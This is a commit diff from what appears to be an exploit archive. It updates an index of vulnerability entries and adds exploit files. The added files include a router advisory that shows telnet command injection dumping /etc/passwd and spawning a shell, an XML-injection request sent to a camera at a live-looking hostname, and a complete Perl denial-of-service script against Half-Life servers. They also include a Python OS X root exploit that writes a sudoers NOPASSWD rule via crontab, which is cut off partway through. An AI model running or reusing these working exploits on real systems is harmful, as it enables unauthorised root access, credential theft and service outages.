30212,platforms/php/remote/30212.rb,"vBulletin 5 - index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection",2013-12-11,metasploit,php,remote,80
30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Stored XSS in Multiple Parameters",2013-12-11,sajith,php,webapps,0
30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0
30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plug-in 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0
30216,platforms/cfm/webapps/30216.txt,"FuseTalk <= 4.0 - AuthError.CFM Multiple Cross-Site Scripting Vulnerabilities",2007-06-20,"Ivan Almuina",cfm,webapps,0
30217,platforms/php/webapps/30217.txt,"Wrapper.PHP for OsCommerce Local File Include Vulnerability",2007-06-20,"Joe Bloomquist",php,webapps,0
30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 Parse Error Information Disclosure Vulnerability",2007-06-20,Prili,multiple,remote,0
@ -27594,7 +27594,7 @@ id,file,description,date,author,platform,type,port
30645,platforms/windows/remote/30645.txt,"Microsoft Windows URI Handler Command Execution Vulnerability",2007-10-05,"Billy Rios",windows,remote,0
30646,platforms/linux/dos/30646.txt,"Nagios Plugins 1.4.2/1.4.9 Location Header Remote Buffer Overflow Vulnerability",2007-07-16,"Nobuhiro Ban",linux,dos,0
30647,platforms/php/webapps/30647.txt,"SNewsCMS 2.1 News_page.PHP Cross-Site Scripting Vulnerability",2007-10-08,medconsultation.ru,php,webapps,0
30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plug-in OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0
30648,platforms/linux/dos/30648.txt,"AlsaPlayer 0.99.x - Vorbis Input Plugin OGG Processing Remote Buffer Overflow Vulnerability",2007-10-08,Erik,linux,dos,0
30649,platforms/cgi/webapps/30649.txt,"NetWin DNews Dnewsweb.EXE Multiple Cross-Site Scripting Vulnerabilities",2007-10-09,Doz,cgi,webapps,0
30650,platforms/hardware/remote/30650.txt,"Linksys SPA941 SIP From Field HTML Injection Vulnerability",2007-10-09,"Radu State",hardware,remote,0
30651,platforms/php/webapps/30651.txt,"Webmaster-Tips.net Joomla! RSS Feed Reader 1.0 - Remote File Include Vulnerability",2007-10-10,Cyber-Crime,php,webapps,0
@ -28043,7 +28043,7 @@ id,file,description,date,author,platform,type,port
31151,platforms/linux/local/31151.c,"GKrellM GKrellWeather 0.2.7 Plugin Local Stack Based Buffer Overflow Vulnerability",2008-02-12,forensec,linux,local,0
31152,platforms/php/webapps/31152.txt,"artmedic weblog artmedic_print.php date Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
31153,platforms/php/webapps/31153.txt,"artmedic weblog index.php jahrneu Parameter XSS",2008-02-12,muuratsalo,php,webapps,0
31154,platforms/php/webapps/31154.txt,"Counter Strike Portals 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
31154,platforms/php/webapps/31154.txt,"Counter Strike Portals - 'download' SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
31155,platforms/php/webapps/31155.txt,"Joomla! and Mambo com_iomezun Component - 'id' Parameter SQL Injection Vulnerability",2008-02-12,S@BUN,php,webapps,0
31156,platforms/php/webapps/31156.txt,"Cacti <= 0.8.7 graph_view.php graph_list Parameter SQL Injection",2008-02-12,aScii,php,webapps,0
31157,platforms/php/webapps/31157.txt,"Cacti <= 0.8.7 graph.php view_type Parameter XSS",2008-02-12,aScii,php,webapps,0
@ -28509,7 +28509,7 @@ id,file,description,date,author,platform,type,port
31637,platforms/php/webapps/31637.txt,"W2B Dating Club - 'browse.php' SQL Injection Vulnerability",2008-04-11,The-0utl4w,php,webapps,0
31638,platforms/windows/remote/31638.txt,"HP OpenView Network Node Manager 7.x - (OV NNM) OpenView5.exe Action Parameter Traversal Arbitrary File Access",2008-04-11,"Luigi Auriemma",windows,remote,0
31639,platforms/php/webapps/31639.txt,"Trillian 3.1.9 - DTD File XML Parser Buffer Overflow Vulnerability",2008-04-11,david130490,php,webapps,0
31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 - Add-On 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
31640,platforms/php/webapps/31640.txt,"osCommerce Poll Booth 2.0 AddOn - 'pollbooth.php' SQL Injection Vulnerability",2008-04-13,S@BUN,php,webapps,0
31641,platforms/java/webapps/31641.txt,"Business Objects Infoview - 'cms' Parameter Cross-Site Scripting Vulnerability",2008-04-14,"Sebastien gioria",java,webapps,0
31643,platforms/windows/local/31643.rb,"Easy CD-DA Recorder - (PLS File) Buffer Overflow",2014-02-13,metasploit,windows,local,0
31644,platforms/asp/webapps/31644.txt,"Cezanne 6.5.1/7 - CFLookUP.asp Multiple Parameter XSS",2008-04-14,"Juan de la Fuente Costa",asp,webapps,0
@ -30689,7 +30689,7 @@ id,file,description,date,author,platform,type,port
34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 - Directory Traversal Vulnerability",2010-05-27,"John Leitch",windows,remote,0
34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 - Directory Traversal Vulnerability",2010-05-28,"John Leitch",windows,dos,0
34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats AddOn - 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 - 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0
34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 - Cross-Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0
@ -31416,7 +31416,7 @@ id,file,description,date,author,platform,type,port
34867,platforms/java/remote/34867.rb,"ManageEngine OpManager / Social IT Arbitrary File Upload",2014-10-02,"Pedro Ribeiro",java,remote,80
34868,platforms/windows/remote/34868.c,"Phoenix Project Manager 2.1.0.8 DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
34869,platforms/windows/remote/34869.c,"Cool iPhone Ringtone Maker 2.2.3 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-10-19,anT!-Tr0J4n,windows,remote,0
34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plug-in Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0
34870,platforms/windows/remote/34870.html,"VLC Media Player 1.1.4 Mozilla Multimedia Plugin - Remote Code Execution Vulnerability",2010-10-19,shinnai,windows,remote,0
34871,platforms/php/webapps/34871.txt,"eCardMAX FormXP 'survey_result.php' Cross-Site Scripting Vulnerability",2009-07-15,Moudi,php,webapps,0
34872,platforms/windows/dos/34872.py,"MASS PLAYER 2.1 File Processing Remote Denial of Service Vulnerability",2010-10-19,Sweet,windows,dos,0
34873,platforms/php/webapps/34873.txt,"Wap-motor 'image' Parameter Directory Traversal Vulnerability",2009-08-27,Inj3ct0r,php,webapps,0
@ -32466,7 +32466,7 @@ id,file,description,date,author,platform,type,port
36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component 'userid' Parameter SQL Injection Vulnerability",2011-08-03,"Ne0 H4ck3R",php,webapps,0
36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 'zxpdf' Security Bypass Vulnerability",2011-08-04,"Chung-chieh Shan",multiple,remote,0
36017,platforms/php/webapps/36017.txt,"HESK 2.2 Multiple Cross Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0
36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plug-in 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
36018,platforms/php/webapps/36018.txt,"WordPress WP e-Commerce Plugin 3.8.6 - 'cart_messages[]' Parameter Cross Site Scripting Vulnerability",2011-08-04,"High-Tech Bridge SA",php,webapps,0
36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 'TagSelector.aspx' Cross Site Scripting Vulnerability",2011-08-04,PontoSec,asp,webapps,0
36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control Multiple Cross Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0
36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80
@ -32964,7 +32964,7 @@ id,file,description,date,author,platform,type,port
36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 'users.php' Cross Site Scripting Vulnerability",2012-01-09,Am!r,php,webapps,0
36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 'redirect_to' Parameter URI Redirection Vulnerability",2012-01-10,"Gianluca Brindisi",php,webapps,0
36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 'downloads.php' Cross Site Scripting Vulnerability",2012-01-10,Am!r,php,webapps,0
36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plug-in 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0
36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow and Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0
36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x Multiple Cross Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0
36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0
36545,platforms/linux/dos/36545.txt,"Linux Kernel <= 3.1.8 KVM Local Denial of Service Vulnerability",2011-12-29,"Stephan Sattler",linux,dos,0
@ -34003,7 +34003,7 @@ id,file,description,date,author,platform,type,port
37666,platforms/php/webapps/37666.txt,"Joomla! Helpdesk Pro Plugin < 1.4.0 - Multiple Vulnerabilities",2015-07-21,"Simon Rawet",php,webapps,80
37667,platforms/java/remote/37667.rb,"SysAid Help Desk 'rdslogs' Arbitrary File Upload",2015-07-21,metasploit,java,remote,0
37668,platforms/windows/remote/37668.php,"Internet Download Manager - OLE Automation Array Remote Code Execution",2015-07-21,"Mohammad Reza Espargham",windows,remote,0
37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
37669,platforms/windows/dos/37669.pl,"Counter-Strike 1.6 - 'GameInfo' Query Reflection DoS PoC",2015-07-22,"Todor Donev",windows,dos,0
37670,platforms/osx/local/37670.sh,"OS X 10.10 - DYLD_PRINT_TO_FILE Local Privilege Escalation",2015-07-22,"Stefan Esser",osx,local,0
37671,platforms/multiple/remote/37671.txt,"Websense Content Gateway Multiple Cross Site Scripting Vulnerabilities",2012-08-23,"Steven Sim Kok Leong",multiple,remote,0
37672,platforms/php/webapps/37672.txt,"JW Player 'logo.link' Parameter Cross Site Scripting Vulnerability",2012-08-29,MustLive,php,webapps,0
@ -34656,3 +34656,12 @@ id,file,description,date,author,platform,type,port
38366,platforms/multiple/webapps/38366.py,"Verax NMS Multiple Method Authentication Bypass",2013-02-06,"Andrew Brooks",multiple,webapps,0
38367,platforms/php/webapps/38367.txt,"Your Own Classifieds Cross Site Scripting Vulnerability",2013-03-08,"Rafay Baloch",php,webapps,0
38368,platforms/multiple/remote/38368.txt,"McAfee Vulnerability Manager 'cert_cn' Parameter Cross Site Scripting Vulnerability",2013-03-08,"Asheesh Anaconda",multiple,remote,0
38369,platforms/hardware/webapps/38369.txt,"Bosch Security Systems Dinion NBN-498 Web Interface - XML Injection",2015-10-01,neom22,hardware,webapps,0
38370,platforms/hardware/remote/38370.txt,"PIXORD Vehicle 3G Wi-Fi Router 3GR-431P - Multiple Vulnerabilities",2015-10-01,"Karn Ganeshen",hardware,remote,0
38371,platforms/osx/local/38371.py,"Mac OS X 10.9.5 / 10.10.5 - rsh/libmalloc Privilege Escalation",2015-10-01,rebel,osx,local,0
38372,platforms/php/webapps/38372.html,"Question2Answer Cross Site Request Forgery Vulnerability",2013-03-01,MustLive,php,webapps,0
38373,platforms/php/webapps/38373.txt,"WordPress Terillion Reviews Plugin Profile Id HTML Injection Vulnerability",2013-03-08,"Aditya Balapure",php,webapps,0
38374,platforms/php/webapps/38374.txt,"SWFUpload Multiple Content Spoofing And Cross Site Scripting Vulnerabilities",2013-03-10,MustLive,php,webapps,0
38375,platforms/php/webapps/38375.txt,"Asteriskguru Queue Statistics 'warning' Parameter Cross Site Scripting Vulnerability",2013-03-10,"Manuel García Cárdenas",php,webapps,0
38376,platforms/php/webapps/38376.txt,"WordPress podPress Plugin 'playerID' Parameter Cross Site Scripting Vulnerability",2013-03-11,hiphop,php,webapps,0
38377,platforms/php/webapps/38377.txt,"Privoxy Proxy Authentication Information Disclosure Vulnerabilities",2013-03-11,"Chris John Riley",php,webapps,0

Can't render this file because it is too large.

231
platforms/hardware/remote/38370.txt Executable file
View file

@ -0,0 +1,231 @@
# Exploit Title: [Vehicle 3G Wi-Fi Router - PIXORD - Multiple
Vulnerabilities]
# Date: May 01, 2015 [No response from Vendor till date]
# Discovered by: Karn Ganeshen
# Vendor Homepage: [http://www.pixord.com/en/products_show.php?show=17]
# Version: [Model Name :3GR-431P]
[Software Version :RTA-A001_02]
[Wireless Driver Version :2.6.0.0]
*Vehicle 3G Wi-Fi Router - PIXORD *
http://www.pixord.com/en/products_show.php?show=17
*Device Info *
Model Name :3GR-431P
Software Version :RTA-A001_02
Wireless Driver Version :2.6.0.0
PiXORD 3GR-431P 3G Wi-Fi Router is a 3G + GPS + 802.11n (2T2R) wireless
router. It supports Internet access via 3G and receives position
information from GPS. 3GR-431P also supports two Ethernet ports for LAN
connectivity and 802.11n Wi-Fi Access Point for WLAN connectivity.
It is available to install the 3GR-431P on the transportation. The
passengers can use the laptop or smart phone via Wi-Fi to browse the
Internet on the go. The Ethernet port also can connect IP camera to provide
the real time monitoring.
Vulnerability Impact: Easy and full device compromise. Access to configured
keys, passwords, pass-phrases, accounts, etc. Ability to monitor the user /
vehicle via camera / connected devices.
*Multiple Security Vulnerabilities *
*1. OS command injection *
$ telnet 192.168.1.10
Trying 192.168.1.10...
Connected to 192.168.1.10.
Escape character is '^]'.
Vehicle 3G Wi-Fi Router
Login: admin
Password:
>
> ?
mobile3G
mobileGPS
model
reboot
restoredefault
version
As seen above, only few specific, functional options are available for
device management.
However, we can bypass this and dump hashes easily.
> ?;cat /etc/passwd
sh: ?: not found
admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh
> exit
Note that this is also applicable when a non-admin user / support logs
in over the Telnet.
The web application lacks strict input validation and hence vulnerable to
OS command injection attack.
*2. Configuration not secured properly / AuthZ issues *
The device has three users - admin, support, user.
Apparently, there is no separation of privileges between these 3 users,
when accessing over HTTP(S). All options are available to all three then.
This allows 'user' /'support' to access device configuration file -
RT2880_Settings.dat. Configuration backup contains b64-encoded login
passwords + clear-text WPA keys + other sensitive information.
.. …
*Sensitive information in configuration file - *
*more RT2880_Settings.dat *
#The following line must not be removed.
Default
WebInit=1
HostName=pixord
Login=admin
Password=<admin_password_here>=
Login2=support
Password2=<support_password_here>==
Login3=user
Password3=<user_password_here>==
OperationMode=1
Platform=RT3352
.....
<snip>
.....
wan_pppoe_user=pppoe_user
wan_pppoe_pass=pppoe_passwd
wan_l2tp_server=l2tp_server
wan_l2tp_user=l2tp_user
wan_l2tp_pass=l2tp_passwd
.....
<snip>
.....
wan_pptp_server=pptp_server
wan_pptp_user=pptp_user
wan_pptp_pass=pptp_passwd
.....
<snip>
.....
DDNS=
DDNSAccount=<ddns_account_name_here>
DDNSPassword=<ddns_password_here>
CountryRegion=
CountryRegionABand=
CountryCode=
BssidNum=1
SSID1=PiXORD
WirelessMode=9
.....
<snip>
.....
WscSSID=RalinkInitialAP
WscKeyMGMT=WPA-EAP
WscConfigMethod=138
WscAuthType=1
WscEncrypType=1
WscNewKey=<wsc_key_here>
IEEE8021X=0
IEEE80211H=0
CSPeriod=6
PreAuth=0
AuthMode=WPAPSKWPA2PSK
EncrypType=TKIPAES
RekeyInterval=3600
RekeyMethod=TIME
PMKCachePeriod=10
WPAPSK1=<WPA_PSK_Key_here>
DefaultKeyID=2
Key1Type=0
Key1Str1=
Key2Type=0
Key2Str1=
Key3Type=0
Key3Str1=
Key4Type=0
Key4Str1=
WapiPskType=0
.....
<snip>
.....
WdsEnable=0
WdsEncrypType=NONE
WdsList=
WdsKey=
WirelessEvent=0
RADIUS_Server=0
RADIUS_Port=1812
RADIUS_Key=
RADIUS_Acct_Server=
RADIUS_Acct_Port=1813
RADIUS_Acct_Key=
.....
<snip>
.....
wan_3g_apn=public
wan_3g_dial=*99#
wan_3g_user=
wan_3g_pass=
<snip>
RADIUS_Key1=<radius_key_here>
.....
<snip>
.....
Also, as observed in point 1 above, all the users have a UID 0, i.e. root
level privileges to the device:
admin:<password1>:0:0:Adminstrator:/:/bin/sh
support:<password2>:0:0:Adminstrator:/:/bin/sh
user:<password3>:0:0:Adminstrator:/:/bin/sh
The application should ideally provide specific privileges to different
users, and enforce strict access control.
*3. Application does not secure configured passwords (HTTPS) *
Masked password(s) can be retrieved via frame source (inspect element) and
/ or intercepting request via a proxy.
The application should mask/censure (*****) the passwords, keys and any
other crucial pieces of configuration and must not pass the values in
clear-text.
*4. Program / Scripts running in an insecure manner - leaking clear-text
passwords in process information *
After logging in to the device over Telnet, we can drop in to a shell via
OS command injection attack described in point 1.
> ?;sh
sh: ?: not found
Enter 'help' for a list of built-in commands.
BusyBox v1.12.1 (2012-12-25 11:48:22 CST) built-in shell (ash)
#
Checking running processes reveal a system program *inadyn*, which
apparently is a service for ddns connectivity, leaking valid username and
password in clear-text.
# ps aux
PID USER VSZ STAT COMMAND
1 admin 1768 S init
2 admin 0 RWN [ksoftirqd/0]
.....
<snip>
.....
2159 admin 1096 S inadyn -u *<ddns-username_here>* -p *<ddns-password_here>*
-a *<ddns_domain_here>*
4050 admin 1768 R ps aux
The programs should be run securely without passing cli arguments and
parameter values in clear-text.
--
Best Regards,
Karn Ganeshen

100
platforms/hardware/webapps/38369.txt Executable file
View file

@ -0,0 +1,100 @@
# Exploit Title: Bosch Security Systems - XML Injection - Dinion NBN-498 Web Interface
# Date: 01/09/2015
# Exploit Author: neom22
# Vendor Homepage: http://us.boschsecurity.com
# Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf
# Version: Hardware Firmware 4.54.0026 - Web Interface version is unknown
# Tested on: Windows 8.1 - Firefox 40.0.3
# CVE : CVE-2015-6970 (To be published)
#################################################
# #
# Discovered by neom22 #
# 23 - 09 - 2015 #
# #
#################################################
#
#
Bosch Security Systems - Dinion NBN-498 - Web Interface (Live Feed and Administration)
#
#
Vulnerability Discovery: 10/09/2015
Vendor Contact: 17/09/2015 (no answer)
Published: 24/09/2015
#
#
Description:
-----------------------------------------------------------------
The Dinion2x IP Day/Night camera is a high-performance, smart
surveillance color camera. It incorporates 20-bit digital signal
processing and a wide dynamic range sensor for outstanding
picture performance under all lighting conditons.
The camera uses H.264 compression technology to give clear
images while reducing bandwidth and storage requirements. It
is also ONVIF compliant to improve compatibility during system
integration.
The camera operates as a network video server and transmits
video and control signals over data networks, such as Ethernet
LANs and the Internet.
-----------------------------------------------------------------
Useful Links:
Data Sheet: http://resource.boschsecurity.us/documents/Data_sheet_enUS_9007201286798987.pdf
Documentation: http://resource.boschsecurity.us/documents/Installation_Manual_enUS_2032074379.pdf
Product:
http://us.boschsecurity.com/en/us_product/products/video/ipcameras/sdfixedcameras/nbn498dinion2xdaynightipc/nbn498
dinion2xdaynightipc_608
-----------------------------------------------------------------
XML Parameter Injection POC
_-Request-_
GET /rcp.xml?idstring=<string>injection</string> HTTP/1.1
Host: postoipiranga.dyndns-ip.com:10004
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: HcsoB=60cd4a687de94857
Connection: keep-alive
_-Response-_
HTTP/1.1 200 OK
Server: VCS-VideoJet-Webserver
Connection: keep-alive
Content-Type: text/xml
Accept-Ranges: bytes
Content-Length: 359
Expires: 0
Cache-Control: no-cache
Set-Cookie: HcsoB=60cd4a687de94857; path=/;
<rcp>
<command>
<hex>0x0000</hex>
<dec> 0</dec>
</command>
<type>T_DWORD</type>
<direction>READ</direction>
<num>0</num>
<idstring><string>injection</string></idstring>
<payload></payload>
<cltid>0x478e</cltid><sessionid>0x00000000</sessionid><auth>1</auth><protocol>TCP</protocol> <result>
<err>0x40</err>
</result>
</rcp>

6
platforms/linux/remote/22141.c
View file

@ -1,8 +1,8 @@
source: http://www.securityfocus.com/bid/6580/info
//source: http://www.securityfocus.com/bid/6580/info
A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
//A format string vulnerability has been discovered in the Half-Life AdminMod plugin. The problem occurs in commands which call the selfmessage() function, which is used by other functions to write a message to the users console. The format string occurs when the System_Response() function is called by selfmessage() to log the administrative command. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server.
// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server.
/*****************************************************************
* hoagie_adminmod.c

6
platforms/linux/remote/22968.c
View file

@ -1,8 +1,8 @@
source: http://www.securityfocus.com/bid/8300/info
//source: http://www.securityfocus.com/bid/8300/info
Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server.
//Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-//check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server.
This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
//This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
//
// PRIV8 SECURITY & UHAGr CONFIDENTIAL SOURCE - DO NOT DISTRIBUTE !!!

6
platforms/linux/remote/22969.c
View file

@ -1,8 +1,8 @@
source: http://www.securityfocus.com/bid/8300/info
// source: http://www.securityfocus.com/bid/8300/info
Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server.
// Half-Life servers are prone to a buffer overflow that may be exploited by a malicious remote client. The vulnerability occurs because the software fails to sufficiently bounds-check client-supplied data during requests to join multiplayer games. This could allow attackers to execute code in the context of the vulnerable server.
This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
// This vulnerability affects the server bundled with Half-Life and the free Dedicated Server for both Windows and Linux operating systems.
/*****************************************************************
* hoagie_hlserver.c

80
platforms/multiple/dos/1483.pl
View file

@ -1,40 +1,40 @@
#!/usr/bin/perl
# Server must not be running steam. /str0ke
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];
if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;
sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";
sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);
$c2=$c[1];
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
# milw0rm.com [2006-02-11]
#!/usr/bin/perl
# Server must not be running steam. /str0ke
# Half-Life engine remote DoS exploit
# bug found by Firestorm
# tested against cstrike 1.6 Windows build-in server, cstrike 1.6 linux dedicated server
use IO::Socket;
die "usage: ./csdos <host>" unless $ARGV[0];
$host=$ARGV[0];
if (fork())
{ econnect($host); }
else
{ econnect($host); };
exit;
sub econnect($)
{
my $host=$_[0];
my $sock = new
IO::Socket::INET(PeerAddr=>$host,PeerPort=>'27015',Proto=>'udp');
die "Could not create socket: $!\n" unless $sock;
$cmd="\xff\xff\xff\xff";
syswrite $sock, $cmd."getchallenge";
sysread $sock,$b,65535; print $b,"\n";
@c=split(/ /,$b);
$c2=$c[1];
$q=$cmd."connect 47 $c2 \"\\prot\\4\\unique\\0\\raw\\valve\\cdkey\\f0ef8a36258af1bb64ed866538c9db76\"\"\\\"\0\0";
print '>',$q,"\n";
syswrite $sock, $q;
sysread $sock,$b,65535; print $b,"\n";
sleep 3;
close $sock;
}
# milw0rm.com [2006-02-11]

8
platforms/multiple/remote/22138.c
View file

@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/6575/info
// source: http://www.securityfocus.com/bid/6575/info
The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
// The Half-Life StatsMe plug-in is prone to an exploitable buffer overflow condition. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
// Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server.
// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server.
/*****************************************************************
* hoagie_statsme.c

6
platforms/multiple/remote/22139.c
View file

@ -1,8 +1,8 @@
source: http://www.securityfocus.com/bid/6577/info
//source: http://www.securityfocus.com/bid/6577/info
A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
// A format string vulnerability has been discovered in the Half-Life ClanMod plugin. The problem occurs in the 'cm_log' command which is designed to write a message to the server log file. An 'rcon' authenticated user may be able to exploit this issue to overwrite sensitive locations in memory.
Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server.
// Successful exploitation of this issue would allow an attacker to execute arbitrary commands with the privileges of the Half-Life server.
/*****************************************************************
* hoagie_clanmod.c

8
platforms/multiple/remote/22140.c
View file

@ -1,10 +1,10 @@
source: http://www.securityfocus.com/bid/6578/info
// source: http://www.securityfocus.com/bid/6578/info
The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
// The Half-Life StatsMe plug-in is prone to an exploitable format string vulnerability. This issue may be exploited by an attacker who can authenticate with the rcon-password of the Half-Life server to execute arbitrary code in the context of the server process.
Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
// Exploitation may be dependant on which other plug-ins are running on the Half-Life server.
Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server.
// Successful exploitation will allow an attacker to gain local and possibly privileged access to the host running the server.
/*****************************************************************
* hoagie_statsme.c

38
platforms/osx/local/38371.py Executable file
View file

@ -0,0 +1,38 @@
# CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
# tested on osx 10.9.5 / 10.10.5
# jul/2015
# by rebel
import os,time,sys
env = {}
s = os.stat("/etc/sudoers").st_size
env['MallocLogFile'] = '/etc/crontab'
env['MallocStackLogging'] = 'yes'
env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
sys.stderr.write("creating /etc/crontab..")
p = os.fork()
if p == 0:
os.close(1)
os.close(2)
os.execve("/usr/bin/rsh",["rsh","localhost"],env)
time.sleep(1)
if "NOPASSWD" not in open("/etc/crontab").read():
sys.stderr.write("failed\n")
sys.exit(-1)
sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")
